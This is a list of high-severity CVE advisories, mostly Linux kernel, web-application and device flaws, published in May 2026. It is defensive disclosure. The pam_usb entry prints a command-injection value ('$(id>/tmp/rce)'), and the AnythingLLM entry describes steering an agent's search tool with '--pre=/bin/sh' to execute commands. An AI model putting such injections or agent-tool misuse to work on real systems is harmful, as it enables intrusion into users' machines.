| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: stop tp_meter sessions during mesh teardown TP meter sessions remain linked on bat_priv->tp_list after the netlink request has already finished. When the mesh interface is removed, batadv_mesh_free() currently tears down the mesh without first draining these sessions. A running sender thread or a late incoming tp_meter packet can then keep processing against a mesh instance which is already shutting down. Synchronize tp_meter with the mesh lifetime by stopping all active sessions from batadv_mesh_free() and waiting for sender threads to exit before teardown continues. | 2026-05-28 | 7.8 | CVE-2026-46208 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/gem: Fix inconsistent plane dimension calculation in drm_gem_fb_init_with_funcs() drm_gem_fb_init_with_funcs() computes sub-sampled plane dimensions using plain integer division: unsigned int width = mode_cmd->width / (i ? info->hsub : 1); unsigned int height = mode_cmd->height / (i ? info->vsub : 1); However, the ioctl-level framebuffer_check() in drm_framebuffer.c uses drm_format_info_plane_width/height() which round up dimensions via DIV_ROUND_UP(). This inconsistency corrupts the subsequent GEM object size check for certain pixel format and dimension combinations. For example, with NV12 (vsub=2) and a 1-pixel-tall framebuffer the GEM size validation path sees height=0 instead of height=1. The expression (height - 1) then wraps to UINT_MAX as an unsigned int, causing min_size to overflow and wrap back to a small value. A tiny GEM object therefore passes the size guard, yet when the GPU accesses the chroma plane it will read or write memory beyond the object's bounds. Fix by replacing the open-coded divisions with drm_format_info_plane_width() and drm_format_info_plane_height(), which use DIV_ROUND_UP() and match the calculation already used in framebuffer_check(). | 2026-05-28 | 7.8 | CVE-2026-46209 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: fix use-after-free of fmt_src during MBPF check During concurrency testing, multiple instances can run in parallel, and each instance uses its own inst->lock while the core->lock protects the list of active instances. The race happens because these locks cover different scopes, inst->lock protects only the internals of a single instance, while the Macro Blocks Per Frame (MBPF) checker walks the core list under core->lock and reads fields like fmt_src->width and fmt_src->height. At the same time, iris_close() may free fmt_src and fmt_dst under inst->lock while the instance is still present in the core list. This allows a situation where the MBPF checker, still iterating through the core list, reaches an instance whose fmt_src was already freed by another thread and ends up dereferencing a dangling pointer, resulting in a use-after-free. This happens because the MBPF checker assumes that any instance in the core list is fully valid, but the freeing of fmt_src and fmt_dst without removing the instance from the core list is not correct. The correct ordering is to defer freeing fmt_src and fmt_dst until after the instance has been removed from the core list and all teardown under the core lock has completed, ensuring that no dangling pointers are ever exposed during MBPF checks. | 2026-05-28 | 7.8 | CVE-2026-46210 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm: Set old handle to NULL before prime swap in change_handle There was a potential race condition in change_handle. The ioctl briefly had a single object with two idr entries; a concurrent gem_close could delete the object and remove one of the handles while leaving the other one dangling, which could subsequently be dereferenced for a use-after-free. To fix this, do the same dance that gem_close itself does. (f6cd7daecff5 drm: Release driver references to handle before making it available again) First idr_replace the old handle to NULL. Later, if the prime operations are successful, actually close it. create_tail required a similar dance to avoid a similar problem. (bd46cece51a3 drm/gem: Fix race in drm_gem_handle_create_tail()) It idr_allocs the new handle with NULL, then swaps in the correct object later to avoid races. We don't need to do that here, since the only operations that could race are drm_prime, and change_handle holds the prime lock for the entire duration. v2: cleanups of error paths | 2026-05-28 | 7.8 | CVE-2026-46215 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Add bounds checking to ib_{get,set}_value The uvd/vce/vcn code accesses the IB at predefined offsets without checking that the IB is large enough. Check the bounds here. The caller is responsible for making sure it can handle arbitrary return values. Also make the idx a uint32_t to prevent overflows causing the condition to fail. | 2026-05-28 | 7.1 | CVE-2026-46218 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sctp: revalidate list cursor after sctp_sendmsg_to_asoc() in SCTP_SENDALL The SCTP_SENDALL path in sctp_sendmsg() iterates ep->asocs with list_for_each_entry_safe(), which caches the next entry in @tmp before the loop body runs. The body calls sctp_sendmsg_to_asoc(), which may drop the socket lock inside sctp_wait_for_sndbuf(). While the lock is dropped, another thread can SCTP_SOCKOPT_PEELOFF the association cached in @tmp, migrating it to a new endpoint via sctp_sock_migrate() (list_del_init() + list_add_tail() to newep->asocs), and optionally close the new socket which frees the association via kfree_rcu(). The cached @tmp can also be freed by a network ABORT for that association, processed in softirq while the lock is dropped. sctp_wait_for_sndbuf() revalidates @asoc (the current entry) on re-lock via the "sk != asoc->base.sk" and "asoc->base.dead" checks, but nothing revalidates @tmp. After a successful return, the iterator advances to the stale @tmp, yielding either a use-after-free (if the peeled socket was closed) or a list-walk onto the new endpoint's list head (type confusion of &newep->asocs as a struct sctp_association *). Both are reachable from CapEff=0; the type-confusion path gives controlled indirect call via the outqueue.sched->init_sid pointer. Fix by re-deriving @tmp from @asoc after sctp_sendmsg_to_asoc() returns. @asoc is known to still be on ep->asocs at that point: the only callers that list_del an association from ep->asocs are sctp_association_free() (which sets asoc->base.dead) and sctp_assoc_migrate() (which changes asoc->base.sk), and sctp_wait_for_sndbuf() checks both under the lock before any successful return; a tripped check propagates as err < 0 and the loop bails before the re-derive. The SCTP_ABORT path in sctp_sendmsg_check_sflags() returns 0 and the loop hits 'continue' before sctp_sendmsg_to_asoc() is ever called, so the @tmp cached by list_for_each_entry_safe() still covers the lock-held free that ba59fb027307 ("sctp: walk the list of asoc safely") was added for. | 2026-05-28 | 7.8 | CVE-2026-46227 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/vcn3: Prevent OOB reads when parsing dec msg Check bounds against the end of the BO whenever we access the msg. | 2026-05-28 | 7.1 | CVE-2026-46230 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/vcn3: Avoid overflow on msg bound check As pointed out by SDL, the previous condition may be vulnerable to overflow. (cherry picked from commit db00257ac9e4a51eb2515aaea161a019f7125e10) | 2026-05-28 | 7.1 | CVE-2026-46237 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: Fix use-after-free in iris_release_internal_buffers() The recent change in commit 1dabf00ee206 ("media: iris: gen1: Destroy internal buffers after FW releases") introduced a regression where session_release_buf() may free the buffer. The caller, iris_release_internal_buffers(), continued to access `buffer` after the call, leading to a potential use-after-free. Fix this by setting BUF_ATTR_PENDING_RELEASE before calling session_release_buf(), and reverting the flag if the call fails. This ensures no dereference occurs after potential freeing. | 2026-05-28 | 7.8 | CVE-2026-46240 |
| litespeedtech--LiteSpeed Cache | The LiteSpeed Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the /wp-json/litespeed/v1/notify_ccss and /wp-json/litespeed/v1/notify_ucss REST API endpoints in all versions up to, and including, 7.7. These endpoints accept CSS content from QUIC.cloud callback notifications and store it to disk without sanitization. The stored content is later rendered inline on frontend page loads without output escaping. The access control protecting these endpoints is IP-based validation that can potentially be bypassed when the WordPress site is deployed behind a reverse proxy, load balancer, or CDN with certain configurations. This makes it possible for unauthenticated attackers, under certain conditions, to inject arbitrary JavaScript into CCSS/UCSS content. | 2026-05-27 | 7.2 | CVE-2026-3375 |
| Livebms--Gate Pass Management System | Gate Pass Management System 2.1 contains an SQL injection vulnerability that allows unauthenticated attackers to bypass authentication by injecting SQL code through the login and password parameters. Attackers can submit crafted POST requests to login-exec.php with SQL injection payloads in form parameters to authenticate without valid credentials and gain access to the application. | 2026-05-30 | 8.2 | CVE-2018-25424 |
| Ludwig You--QuickWebP – Compress / Optimize Images & Convert WebP \| SEO Friendly | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Ludwig You QuickWebP – Compress / Optimize Images & Convert WebP \| SEO Friendly quickwebp allows Path Traversal. This issue affects QuickWebP – Compress / Optimize Images & Convert WebP \| SEO Friendly: from n/a through <= 3.2.7. | 2026-05-27 | 9.9 | CVE-2026-42756 |
| M-Gb--MGB OpenSource Guestbook | MGB OpenSource Guestbook 0.7.0.2 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to email.php with crafted SQL payloads in the 'id' parameter to extract sensitive database information including table and column names. | 2026-05-30 | 8.2 | CVE-2018-25411 |
| Magentech--SW Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Magentech SW Core allows PHP Local File Inclusion. This issue affects SW Core: from n/a through 1.7.18. | 2026-05-26 | 7.5 | CVE-2026-39661 |
| MapServer--MapServer | MapServer is a system for developing web-based GIS applications. From 6.4.0 to before 8.6.3, msSLDParseUserStyle always calls `_SLDApplyRuleValues(psRule, psLayer, 1);` for any `<Rule>` carrying `<ElseFilter/>`; it assumes msSLDParseRule added one class. When the rule has no symbolizer (a structurally valid SLD), msSLDParseRule adds zero, and _SLDApplyRuleValues ends up indexing `_class[-1]`, resulting in a NULL pointer dereference. A 200-byte well-formed SLD via the WMS SLD_BODY= parameter is enough to trigger this, no auth required. This vulnerability is fixed in 8.6.3. | 2026-05-27 | 7.5 | CVE-2026-45104 |
| marcantondahmen--automad | Automad is a flat-file content management system and template engine. From 2.0.0-alpha.1 to 2.0.0-beta.27, a Broken Access Control vulnerability allows an unauthenticated attacker to retrieve the bcrypt password hash of every administrator account with a single POST request. The /_api/user-collection/create-first-user setup endpoint remains publicly accessible once initial configuration is complete and returns full serialized user data in the JSON response body. This vulnerability is fixed in 2.0.0-beta.28. | 2026-05-28 | 7.5 | CVE-2026-45332 |
| MarcelRoozekrans--roslyn-codelens-mcp | Roslyn CodeLens MCP Server is a Roslyn-based MCP server providing semantic code intelligence for .NET codebases. From 0.0.9 to 1.17.0, the get_diagnostics MCP tool loads and executes all DiagnosticAnalyzer assemblies referenced by the target solution without any allowlist, signature check, or user confirmation; includeAnalyzers defaults to true, so no explicit opt-in is required. An attacker who can place a malicious .csproj referencing an attacker-controlled DLL in a location the victim opens with the MCP server will achieve arbitrary code execution in the server process with the server's OS privileges. This vulnerability is fixed in 1.17.0. | 2026-05-29 | 7.8 | CVE-2026-45555 |
| masci--banks | Banks generates meaningful LLM prompts using a template language that makes sense. Prior to 2.4.2, banks uses jinja2.Environment() (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to Prompt() are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system. This vulnerability is fixed in 2.4.2. | 2026-05-26 | 7.5 | CVE-2026-44209 |
| Mattermost--Mattermost | Mattermost Plugins versions <=1.1.5 fail to sanitize filenames received from federated peers before using them to construct export destination paths, which allows an administrator of a remote federated Mattermost server to write files to arbitrary locations within the target server's filestore via a malicious filename delivered through the shared-channel attachment sync protocol. Mattermost Advisory ID: MMSA-2026-00659 | 2026-05-27 | 8 | CVE-2026-6957 |
| Mautic--API Contact Filtering | An SQL injection vulnerability exists in Mautic's API contact filtering mechanism. Due to insufficient recursive sanitization of nested query parameters, an authenticated API user can bypass input filtering and inject arbitrary SQL commands. | 2026-05-29 | 7.1 | CVE-2026-4776 |
| Mautic--Mautic 7 API v2 | An authorization bypass vulnerability exists in the Mautic 7 API v2 endpoints (utilizing API Platform). Under certain conditions, roles configured with owner-scope restrictions (such as `viewown` or `editown`) are not properly enforced. This allows low-privilege authenticated API users to bypass ownership-logic controls and access or modify resources belonging to other users. | 2026-05-29 | 7.1 | CVE-2026-9808 |
| Mautic--Mautic 7 Campaign Import | A path traversal vulnerability exists in the campaign import feature of Mautic 7. When extracting uploaded ZIP files during campaign imports, a flaw in the validation logic allows file paths to escape the intended temporary directories. An authenticated user with campaign import privileges (campaign:imports:create) can write arbitrary PHP files to sensitive system directories. An attacker can exploit this to overwrite critical internal configuration or cache components, resulting in Remote Code Execution (RCE) under the context of the web server user. | 2026-05-29 | 9.9 | CVE-2026-9559 |
| Mautic--Mautic 7 Projects | A stored Cross-Site Scripting (XSS) vulnerability exists in the Projects component of Mautic 7. When displaying project tags and popovers on administrative detail views (such as campaigns, emails, or forms), user-supplied project names are rendered without proper sanitization. An authenticated user with permissions to create or edit projects can exploit this to inject malicious script payloads. When an administrative user views an entity associated with a compromised project and hovers over its tag, the injected script executes within the context of their active browser session. This could allow an attacker to perform administrative actions on behalf of the victim, alter system configurations, or exfiltrate sensitive data. | 2026-05-29 | 7.6 | CVE-2026-9809 |
| Mautic--Mautic Theme Engine | A Server-Side Template Injection (SSTI) vulnerability exists in Mautic's theme engine. The platform renders uploaded Twig templates without a sandbox or strict function restrictions. Authenticated users with permissions to create or upload themes can abuse this to execute arbitrary code on the hosting server (Remote Code Execution) or access restricted system files and configuration settings. | 2026-05-29 | 9.9 | CVE-2026-9558 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the userinfo endpoint due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40810 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the ssoabstractservice due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40811 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getLiveValues function's sn parameter due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40812 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getLiveValues function's tagid parameter due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40813 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the dataapi.php file's _mb24confi_getTagAlarm function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40814 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the _mb24api_getUserAccount function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40815 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the mb24alarm.php file's _mb24confi_getTagAlarm function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40816 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getAlarmProfiles function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40817 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the _mb24confi_getDevice function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40818 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the sync_data24 task due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40819 |
| MB connect line--mbCONNECT24 | A low-privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the dash.php file's saveDashboardLayout function due to improper neutralization of special elements in a SQL INSERT command, allowing for reading the whole database and inserting entries into a non-critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 7.1 | CVE-2026-40833 |
| MB connect line--mbCONNECT24 | A low-privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the dash_layout.php file's saveDashboardLayout function due to improper neutralization of special elements in a SQL INSERT command, allowing for reading the whole database and inserting entries into a non-critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 7.1 | CVE-2026-40834 |
| MB connect line--mbCONNECT24 | A low-privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the inmessage model due to improper neutralization of special elements in a SQL DELETE command, allowing for reading the whole database and deleting entries in a non-critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 7.1 | CVE-2026-40836 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getAccountData function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40850 |
| MB connect line--mbNET/mbNET.rokey | A local attacker can perform a confusion attack on the cfgparser via a specially crafted file on a USB stick, leading to code execution. This can result in a total loss of confidentiality, integrity and availability. | 2026-05-27 | 8.4 | CVE-2026-40851 |
| MB connect line--mbNET/mbNET.rokey | A highly authenticated attacker can alter the config generator, injecting a payload into future created configurations. The device does not correctly check this configuration value before passing it to a system execute call, leading to code execution. This can result in a total loss of confidentiality, integrity and availability. | 2026-05-27 | 7.2 | CVE-2026-40852 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.8.7, a crafted UUID such as $(id>/tmp/rce) in the config causes root RCE when pamusb-conf --reset-pads is run. A USB device with a crafted filesystem UUID (some controllers allow this) can inject the payload at --add-device time. Also, userName from the XML config is passed to os.system() in pamusb-agent, which invokes a shell. This vulnerability is fixed in 0.8.7. | 2026-05-27 | 8.2 | CVE-2026-44712 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.8.7, src/tmux.c reads the user's $TMUX environment variable, splits it on commas, and interpolates the socket-path component directly into a shell command passed to popen(). Because the value is placed inside double-quotes without sanitisation, any value containing " terminates the quoted string and injects arbitrary shell syntax. popen() runs as root inside the PAM stack. This vulnerability is fixed in 0.8.7. | 2026-05-27 | 8.8 | CVE-2026-44713 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.1, when a PAM service is configured with deny_remote=false in pam_usb (commonly done for display managers such as gdm-password or lightdm to bypass process/TTY heuristics for local sessions), the PAM_RHOST check in pusb_do_auth() is also skipped. PAM_RHOST is set by remote daemons (sshd, XDMCP servers) to identify the remote client address. Because the check is gated inside if (opts.deny_remote), a genuine remote XDMCP connection reaches the USB device authentication step instead of being rejected. This vulnerability is fixed in 0.9.1. | 2026-05-27 | 8.1 | CVE-2026-48064 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.8.7, pamusb-pinentry reads the PINENTRY_FALLBACK_APP environment variable and executes it directly without any validation. Any process that can set environment variables before pamusb-pinentry is invoked can point PINENTRY_FALLBACK_APP at an arbitrary binary or script and have it executed with the privileges of the pam_usb tool chain. This vulnerability is fixed in 0.8.7. | 2026-05-27 | 7.8 | CVE-2026-44709 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.8.7, symlink attacks on pad directory and pad files enable authentication bypass and root file corruption. This vulnerability is fixed in 0.8.7. | 2026-05-27 | 7.9 | CVE-2026-44711 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.0, pam_usb's deny_remote feature checks utmpx ut_addr_v6 to detect whether an authentication request originates from a remote session. The outer guard was if (utent->ut_addr_v6[0] != 0), which only tests the first 32-bit word of the 128-bit address field. IPv4-mapped IPv6 addresses (::ffff:x.x.x.x) store the IPv4 address in ut_addr_v6[3] with ut_addr_v6[0] == 0. On systems where the SSH daemon listens on :: (IPv6 wildcard) with AddressFamily any -- common on Ubuntu and Debian -- incoming IPv4 connections are recorded in utmpx as IPv4-mapped IPv6 addresses. The outer check evaluates to false, the remote-detection block is skipped entirely, and the session is treated as local. deny_remote=true does not block the authentication. An attacker with physical access to a registered USB device can authenticate over SSH on an affected system as if they were sitting at a local terminal, bypassing the deny_remote restriction. This vulnerability is fixed in 0.9.0. | 2026-05-27 | 7.4 | CVE-2026-47269 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.0, the pusb_pad_compare() function in src/pad.c only verified that the user-side pad (~/.pamusb/device.pad) could be read, but did not enforce that the system-side pad (the pad file on the USB device) was also present and readable. If the user-side pad was deleted or unreadable, the function returned a failure that was treated as non-fatal in certain code paths, allowing authentication to succeed without the USB device being verified. A local user can delete their own ~/.pamusb/device.pad to remove the USB device requirement and authenticate without the physical device. This vulnerability is fixed in 0.9.0. | 2026-05-27 | 7.1 | CVE-2026-47272 |
| MedDream--PACS Server Premium | MedDream PACS Server Premium 6.7.1.1 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the email parameter. Attackers can submit crafted POST requests to the userSignup.php endpoint with SQL payloads in the email field to extract sensitive database information from the backend MySQL database. | 2026-05-25 | 8.2 | CVE-2018-25372 |
| MediaArea--MediaInfoLib | MediaArea MediaInfoLib LXF parsing heap-based buffer overflow vulnerability | 2026-05-26 | 7.8 | CVE-2026-25104 |
| MediaArea--MediaInfoLib | MediaArea MediaInfoLib ID3v2 parsing heap buffer overflow vulnerability | 2026-05-26 | 7.8 | CVE-2026-25713 |
| microsoft--UFO | Microsoft UFO is an open-source framework for intelligent automation across devices and platforms. In 3.0.1-4-ge2626659, Microsoft UFO uses the user-controlled task_name value directly when constructing session log paths. An authenticated client can supply path traversal sequences in task_name and cause UFO to create log directories and log files outside the intended logs/ directory. | 2026-05-27 | 8.1 | CVE-2026-46402 |
| microsoft--UFO | Microsoft UFO is an open-source framework for intelligent automation across devices and platforms. In 3.0.1-4-ge2626659, Microsoft UFO's WebSocket control plane trusts client-supplied identity and role fields in task messages. A client connection can register as a normal device, but later send a TASK message claiming client_type="constellation" and target_id=<victim-device-id>. The server trusts the role and target values from the wire message rather than enforcing the role registered for that WebSocket connection. As a result, any authenticated WebSocket client with the shared server token can spoof the higher-privilege constellation role and dispatch attacker-controlled tasks to another connected device. The same client registry also allows duplicate client_id registration, overwriting an existing live client's stored websocket, role, and task protocol. This is an authenticated WebSocket role/identity spoofing issue leading to peer task hijacking. | 2026-05-27 | 8.8 | CVE-2026-46414 |
| microsoft--UFO | Microsoft UFO is an open-source framework for intelligent automation across devices and platforms. Microsoft UFO tagged releases up to and including v3.0.0 contain an OS command injection vulnerability in the shell action replay path. In affected releases, ShellReceiver.run_shell() passes a command string from action parameters directly to subprocess.Popen() with shell=True and executable=powershell.exe. The same shell-execution behavior is also reachable through ShellReceiver.execute_command(). The shell receiver is invoked by action classes such as RunShellCommand.execute() and ExecuteCommand.execute(), which forward stored action parameters to the shell receiver. Because UFO stores planned and executed actions in per-session JSON records, an attacker who can write or modify a session/action JSON file can plant a shell action. When the session is resumed or replayed, UFO executes the attacker's command as the UFO process user. | 2026-05-27 | 7.8 | CVE-2026-45322 |
| mikro-orm--mikro-orm | MikroORM is a TypeScript ORM for Node.js based on Data Mapper, Unit of Work and Identity Map patterns. Prior to @mikro-orm/knex 6.6.14 and @mikro-orm/sql 7.0.14, MikroORM's identifier-quoting helper (Platform.quoteIdentifier and the postgres/mssql overrides) and its JSON-path emitters (Platform.getSearchJsonPropertyKey, quoteJsonKey) did not properly escape characters that delimit the SQL identifier or string-literal context they emit into. When application code passes attacker-influenced strings to public ORM APIs that expect an identifier or a JSON-property filter, an attacker can break out of the quoted context and inject arbitrary SQL. This vulnerability is fixed in @mikro-orm/knex 6.6.14 and @mikro-orm/sql 7.0.14. | 2026-05-26 | 7.6 | CVE-2026-44680 |
| miniOrange--miniorange otp verification | Incorrect Privilege Assignment vulnerability in miniOrange miniorange otp verification miniorange-otp-verification allows Privilege Escalation. This issue affects miniorange otp verification: from n/a through <= 5.4.9. | 2026-05-27 | 9.8 | CVE-2026-42731 |
| Mintplex-Labs--anything-llm | AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to 1.13.0, the filesystem-search-files agent skill passes its LLM-controlled pattern parameter to ripgrep as a positional argument without a -- end-of-options separator. ripgrep parses any argument that starts with - as an option, so a pattern of --pre=/bin/sh turns ripgrep into a script executor: it runs /bin/sh <file> for every file it walks. An attacker who can chat with an agent on a deployment with the filesystem plugin enabled (the default in the official Docker image) can use this, together with the sibling filesystem-write-text-file skill, to run arbitrary commands inside the AnythingLLM server container. This vulnerability is fixed in 1.13.0. | 2026-05-28 | 7.5 | CVE-2026-48116 |
| Mirasvit--Full Page Cache Warmer for Magento 2 | Mirasvit Full Page Cache Warmer for Magento 2 before version 1.11.12 contains a PHP object injection vulnerability that allows unauthenticated attackers to achieve remote code execution by supplying a crafted serialized PHP object in the CacheWarmer cookie. Attackers can exploit the unrestricted call to PHP's native unserialize() function combined with gadget chains available in Magento and its dependencies to execute arbitrary code on the server. | 2026-05-26 | 9.8 | CVE-2026-45247 |
| Moosocial--mooSocial Store Plugin | mooSocial Store Plugin 2.6 contains a blind SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries through the product parameter in URL rewrite functionality. Attackers can inject SQL code using boolean-based blind, time-based blind, or stacked query techniques in the product URI parameter to extract sensitive database information. | 2026-05-25 | 8.2 | CVE-2018-25371 |
| mossdef-org--luci-app-https-dns-proxy | luci-app-https-dns-proxy through 2025.12.29-5 - an optional LuCI web UI add-on for the https-dns-proxy package, distributed through the OpenWrt community packages feed and not installed by default - contains a command injection vulnerability in the setInitAction function. An authenticated user holding the luci.https-dns-proxy ACL permission can inject shell metacharacters through the 'name' parameter of a ubus RPC call to luci.https-dns-proxy setInitAction, resulting in arbitrary command execution as root on the underlying device. Core OpenWrt is not affected; only installations that have opted in to the luci-app-https-dns-proxy package are vulnerable. | 2026-05-26 | 8.8 | CVE-2026-46368 |
| mouse07410--asn1c | mouse07410/asn1c is an ASN.1 compiler. In 1.4 and earlier, a memory safety vulnerability was identified in the OER decoding skeleton files generated by asn1c (specifically INTEGER_oer.c). When parsing a maliciously crafted, zero-length OER payload for a variable-length, non-negative INTEGER type, the decoder fails to validate the required bytes before extracting the Most Significant Bit (MSB). This forces a precise 1-byte Heap Out-of-Bounds (OOB) Read. Because asn1c generated code is primarily deployed to parse untrusted network inputs (such as V2X network protocols, 5G telecom headers, or X.509 certificates), when the decoder processes untrusted network-originated input, a remote attacker can exploit this to cause a Denial of Service (DoS) or trigger incorrect integer interpretation in downstream applications (e.g., protocol state poisoning or logic bypass). | 2026-05-29 | 8.2 | CVE-2026-45615 |
| MusicPlayerDaemon--MPD | Music Player Daemon (MPD) before version 0.24.11 contains a stack buffer overflow vulnerability in the pcm_unpack_24be function in src/pcm/Pack.cxx that allows unauthenticated attackers to corrupt stack memory by triggering an off-by-one write in the PCM decoder plugin. Attackers can issue two MPD commands referencing a malicious HTTP audio source to cause the unpack loop to write 1366 entries into a 1365-entry buffer, overwriting four bytes past the array boundary with three attacker-controlled bytes from an HTTP response body, resulting in daemon termination or potential code execution. | 2026-05-28 | 8.6 | CVE-2026-49127 |
| MusicPlayerDaemon--MPD | Music Player Daemon (MPD) before version 0.24.11 contains a path traversal vulnerability in LocalStorage::MapFSOrThrow and LocalStorage::MapUTF8 within the local storage plugin, where the on-disk path is constructed by joining the storage root with a user-supplied URI as plain strings without canonicalization, allowing '..' segments to survive into the resolved path and be flattened by the kernel at openat() time. An unauthenticated attacker can exploit this flaw using the listfiles command to enumerate names, sizes, and modification times of arbitrary directories readable by the MPD process, and the albumart command to read image files in any attacker-chosen directory outside the configured music_directory. | 2026-05-28 | 7.5 | CVE-2026-49128 |
| nautobot--nautobot | Nautobot is a Network Source of Truth and Network Automation Platform. Prior to 2.4.33 and 3.1.2, Nautobot's Webhook data model and associated feature set could be configured by users with sufficient access to perform requests to various hosts and IP addresses that should not be permitted, allowing for various behaviors similar to server-side request forgery (SSRF). This vulnerability is fixed in 2.4.33 and 3.1.2. | 2026-05-28 | 8.5 | CVE-2026-44797 |
| nautobot--nautobot | Nautobot is a Network Source of Truth and Network Automation Platform. Prior to 2.4.33 and 3.1.2, a user with access to add/change a GitRepository record could use the REST API to directly set the current_head field on the record, which was not intended to be user-editable. Doing so could cause Nautobot's local clone(s) of the relevant repository to checkout a commit other than the latest commit on the specified branch (resulting in misleading state), or potentially to be unable to make use of the repository at all (until manually remediated) due to the current_head pointing to a nonexistent commit hash or malformed value. This vulnerability is fixed in 2.4.33 and 3.1.2. | 2026-05-28 | 7.1 | CVE-2026-44798 |
| Network Optix--Nx Witness VMS | CORS misconfiguration in the REST API of Network Optix Nx Witness VMS before version 6.1.2, when running in the default Standard security mode, on Linux and Windows allows an unauthenticated remote attacker to steal the session token of an authenticated user and perform Administrator Account Takeover via a malicious cross-origin web page visited by the victim. The High security mode is not affected. Workaround: For existing installations running in Standard security mode, set Access-Control-Allow-Credentials to false via the REST API: PATCH /rest/v2/system/settings with body {"supportedOrigins": "null"}. Alternatively, select High security level during initial setup. Solution: Update to Nx Witness VMS version 6.1.2 or later, in which Access-Control-Allow-Credentials is set to false in the default Standard security configuration. | 2026-05-29 | 7.5 | CVE-2026-10056 |
| NI--SystemLink Enterprise | There is an authentication bypass vulnerability in the NI SystemLink Enterprise Dashboard application that may allow an unauthenticated remote attacker to bypass authentication controls leading to privilege escalation or information disclosure. Successful exploitation requires an attacker to send a specially crafted HTTP request. This vulnerability affects NI SystemLink Enterprise 2026-04 and prior versions. | 2026-05-29 | 9.1 | CVE-2026-9051 |
